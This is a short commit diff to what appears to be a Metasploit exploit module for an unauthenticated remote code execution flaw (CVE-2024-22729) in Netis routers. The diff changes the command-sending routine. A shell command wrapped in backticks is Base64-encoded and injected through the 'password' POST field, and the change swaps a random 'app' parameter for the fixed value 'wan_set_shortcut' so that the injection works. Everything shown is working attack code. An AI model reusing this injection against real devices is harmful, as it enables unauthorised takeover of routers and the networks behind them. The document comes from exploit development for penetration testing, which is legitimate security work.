Final draft

h00die-gr3y · h00die-gr3y · commit 0e3471d5431e · 2024-06-07T19:47:06.000Z
diff --git a/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb b/modules/exploits/linux/http/netis_unauth_rce_cve_2024_22729.rb
@@ -77,7 +77,6 @@ def execute_command(cmd, _opts = {})
 
     # skip last command to remove payload because it does not work
     unless cmd.include?('rm -f')
-      app_random = Rex::Text.rand_text_alphanumeric(4..8)
       payload = Base64.strict_encode64("`#{cmd}`")
       print_status("Executing #{cmd}")
       send_request_cgi({
@@ -86,7 +85,7 @@ def execute_command(cmd, _opts = {})
         'vars_post' => {
           'password' => payload,
           'quick_set' => 'ap',
-          'app' => app_random
+          'app' => 'wan_set_shortcut'
         }
       })
     end
